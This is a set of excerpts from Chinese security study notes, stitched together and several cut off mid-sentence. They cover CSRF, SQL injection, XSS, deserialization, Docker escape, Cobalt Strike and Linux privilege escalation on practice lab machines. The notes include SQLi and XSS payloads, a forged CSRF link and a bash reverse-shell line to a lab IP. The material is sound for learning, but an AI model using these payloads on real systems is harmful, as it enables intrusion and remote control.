图片来源于百度图片。==本篇文章仅用于自我学习,笔记记录,不得用于其他违规用途。==一、CSRF代码审计1、CSRF(GET)查看源码漏洞复现登录vince账户,点击修改信息,抓到包可以发现是get方式更改信息,我们只需要构造链接,使登录admin账户的用户点击,即可更改admin账户的信息。构造好的链接:http://pikaqiu/vul/csrf/csrfget/csrf_get_edit.phpcsrf_get_edit.php?sex=%E7%94%B7&phonenum=13255555555&add=22222&email=111111&submit=submit登录admin账户,这是此时admin的信息:然后点击构造好的链接,可以发现admin的信息改变了。2、CSRF(POST)查看源码只是变成了post传参。漏洞复现登录vince,修改信息,抓包,右键使用burp生成csrf poc。复制到html里,下图是admin现在信息:在admin账户是登录的情况下,点击刚刚做好的html。可以看到信息已经改变了:3、CSRF(Token)加入token验证后就无法通过了
注意:本篇文章仅用于学习记录,不得用于其他用途。一、docker逃逸docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。二、常见的逃逸方法1、配置不当引起的逃逸(1)Docker Remote API未授权访问(2)docker.sock挂载到容器内部(3)privileged特权模式启动docker(4)挂载敏感目录(如:宿主机根目录)2、Docker软件设计引起的逃逸(漏洞)(1)runC容器逃逸漏洞(CVE-2019-5736)(2)Docker cp命令(CVE-2019-14271)3、内核漏洞引起的逃逸脏牛漏洞,实战遇到的也不多,逃逸的原理是宿主机的内核有脏牛提权漏洞,docker容器又是和宿主机公用一套内核的,所在docker容器内使用脏牛拿的root shell,是内核级别的,即拿到了宿主机的root shell。## 4、如何判断是宿主机还是docker容器 ### (1)检查根目录下./dockerenv文件是否存在 ls -la ./dockerenv ### (2)检查/proc/1/cgroup
该国外CMS,使用Seay源代码审计系统扫描后扫出64个漏洞,其中SQL注入20个,文件包含4个,代码执行2个,任意文件读取/删除/修改/写入35个,变量覆盖1个,XSS2个。但经过人工审计和核查,一、员工扣除工资增加—XSS漏洞1、漏洞url"E:\phpstudy_pro\WWW\aps\admin\deduction_add.php"2、漏洞源代码3、漏洞产生原因对前端传入的参数没有进行过滤和验证。4、漏洞复现(1)进入后台(2)进入Deductions页面(3)新增一个员工扣除情况(4)输入alert(1)(5)弹出XSS漏洞二、员工添加页面存在—XSS漏洞1、漏洞url"E:\phpstudy_pro\WWW\aps\admin\employee_add.php"2、漏洞源代码3、漏洞产生原因对前端传入的信息不进行过滤和验证,直接插入到数据库中。4、漏洞复现(1)登录后台(2)进入员工列表,点击添加(3)输入框输入alert(1)后保存(4)弹出XSS漏洞,而且每次进入该页面都会弹出,所以为存储型XSS漏洞三、员工编辑页面存在—XSS漏洞1、漏洞url"E:\phpstudy
图片来源于百度图片。==注意:本篇文章仅用于学习以及笔记记录,不得用于其他违规用途。==一、环境搭建首先搭建Pikachu靶场环境。https://github.com/zhuifengshaonianhanlu/pikachu将下载好的pikachu文件夹放到phpstudy的web服务器根目录下,根据实际情况修改inc/config.inc.php里面的数据库连接设置,访问pikachu网址,点击初始化安装,即可完成安装。二、SQL注入代码审计1、数字型SQL注入如图所示为SQL数字型注入页面,找到该网页源码。下图为关键代码:这里面的SQL语句前后无过滤和判断,使用burp抓包复现:复现出这种即可证明存在该漏洞。2、字符型SQL注入查看源代码:漏洞复现:3、http头注入查看源码:漏洞复现4、盲注查看源码:漏洞复现:payload:kobe'%20and%20'1'='1kobe'%20and%20'1'='25、宽字节注入查看源码:漏洞复现:三、XSS代码审计1、反射型XSS查看源码:漏洞复现:输入2、存储型XSS查看源码:直接输出用户提交的数据 , 触发储存型XSS漏洞复现:四
一、报错信息ERROR: Could not build wheels for opencv-python-headless which use PEP 517 and cannot be installed directly二、结局方法更新pip命令:pip install --upgrade pip三、参考文章https://blog.csdn.net/qq_24568487/article/details/122132833https://blog.csdn.net/z704630835/article/details/124564044感谢两位佬的经验分享。
本篇文章只是用来笔记记录,交流学习,不得用于其他用途。一、描述反序列化又叫对象注入,序列化在内部没有漏洞,漏洞产生是因为程序在处理对象、魔术函数以及序列化相关问题导致的,当传给unserialize()参数可控时,那么用户就可以注入payload,进行反序列化的时候就看你触发对象中的一些魔术方法。二、序列化和反序列化介绍serialize()将一个对象转换成一个字符串。unserialize()将字符串还原为一个对象。在php应用中,序列化和反序列化一般用作缓存,比如session缓存,cookie等,简单点讲序列化就是把一个对象变为可以传输的字符串,而序列化就是把字符还原为对象。三、序列化1、序列化方法php中序列化一般有以下几种,使用serialize()方法。2、序列化serialize()对象的状态信息转换为可以存储或传输的形式的过程,在序列化期间,对象将当前的状态写入到临时或持久性的存储区,将状态信息保存为字符串。3、字符串序列化<?php $a='test'; echo '序列化:'; $b=serialize($a); print_r($b); ?>输出结果为
本篇文章仅用于学习记录,不得用于其他用途。一、CS简介1、CS简介Cobalt Strike是一款基于java的渗透测试神奇,常被称为CS神奇。自3.0以后已经不在使用Metasploit框 架而作为一个独立的平台使用,分为客户端与服务端 (CS架构的),服务端是一个,客户端可以有多个,非常适合团 队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做 模拟对抗,进行内网渗透。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木⻢生成,win dll木⻢生成, java木⻢生成,office宏病毒生成,木⻢捆绑;钓⻥攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。官方网站 https://www.cobaltstrike.com/2、为什么有CS非常适合团队协同作战 , 简称多人运动 , 插件也比较丰富 , 也是目前主流的c2工具二、目录结构agscript 拓展应用的脚本 c2lint
一、level-1这一关通过$_GET["name"],获取name的值,没有过滤通过echo直接进行了输出,所以很简单payload:name=123alert('xss'); 二、level-2这一关获取浏览器提交的keyword值,未进行过滤,输出在。如果是keyword提交的是alert(xss),返回的就会是
一、记录在学习git的时候,从本地仓库推送到远程的时候,出现了上图提示,刚开始没细看,以为是账号密码错误,输了好多次还是这样,我才定睛一看,原来是在2021年8月13日移除了密码认证,请登录该网址查看详细内容。在网上找了找,大概就是需要加一个个人的token,而且设置期限。二、解决1、登录github,找到个人设置:翻到最下面,找到开发者设置:进入后,选择个人token,然后生成一个新的token:验证密码后,进入这个页面,填好需要填的:然后就会生成一个token:复制好,建议保存,然后git的时候,提示输入用户名和密码,用户名还是你的用户名,密码填这个,然后就发现推送成功了。如果提示:远程仓库包含您本地尚不存在的提交。第一种方法:强制推送强制上传输入命令: git push -u origin +master第二种方法:先同步远程到本地,然后再推送:git fetch origin https://github.com/threeshui/SomePoc.git git merge origin/master //获取远程更新 git push origin master //把更
本篇文章仅用于学习记录,不得用于其他违规用途。一、内核漏洞提权1、常规查找查看内核版本信息uname -a uname -r查看系统发行版本cat /etc/issue cat /etc/*-release Ubuntu 16.04 4.4.0-21-generic搜索该版本漏洞,把对应版本的文件上传到服务器编译执行searchsploit Ubuntu16.04 searchsploit -u #更新数据库2、Ubuntu 16.04提权DC-3 靶机做实验 , 开局一个shell http://192.168.0.189/templates/beez3/error.php /bin/bash -i >& /dev/tcp/192.168.101.48/5656 0>&1 DC-3下载地址 https://www.vulnhub.com/entry/dc-32,312/ 后台 http://192.168.101.123/administrator/ admin snoopy发现是ubuntu16.04内核版本是4.4.0-21的,直接通过kali里面
易水哲
一个什么都会一点的白帽子